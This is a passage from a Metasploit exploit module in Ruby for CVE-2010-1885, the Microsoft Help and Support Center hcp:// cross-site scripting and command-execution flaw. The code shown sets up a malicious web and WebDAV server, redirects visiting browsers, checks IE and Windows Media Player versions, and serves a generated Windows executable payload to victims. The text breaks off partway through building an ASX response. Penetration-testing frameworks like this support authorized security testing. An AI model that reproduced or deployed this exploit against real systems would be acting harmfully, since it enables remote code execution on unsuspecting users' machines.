##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
#
# This module acts as a HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Help Center XSS and Command Execution',
'Description' => %q{
Help and Support Center is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp". Due to
an error in validation of input to hcp:// combined with a local cross site
scripting vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved.
On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should continue.
Automatic detection of these options is implemented in this module, and will
default to not sending the exploit for IE8/WMP11 unless the option is overridden.
},
'Author' =>
[
'Tavis Ormandy', # Original discovery
'natron' # Metasploit version
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', 'CVE-2010-1885'],
[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ],
#[ 'MSB', 'MS10-xxx' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ], # Only automatic for now.
#[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
#[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
#[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
],
'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0))
register_options(
[
#OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now
end
def on_request_uri(cli, request)
# If there is no subdirectory in the request, we need to redirect.
if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//)
if (request.uri == '/')
subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
else
subdir = request.uri + '/'
end
print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
send_redirect(cli, subdir)
return
end
case request.method
when 'OPTIONS'
process_options(cli, request)
when 'PROPFIND'
process_propfind(cli, request)
when 'GET'
process_get(cli, request)
else
print_error("Unexpected request method encountered: #{request.method}")
end
end
def process_get(cli, request)
#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
@url_base = "http://" + @my_host
if request.uri.match(/#{@payload}$/i)
print_status "GET for payload received."
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
# ASX Request Inbound
if request.uri.match(/#{@asx_file}/)
asx = %Q|
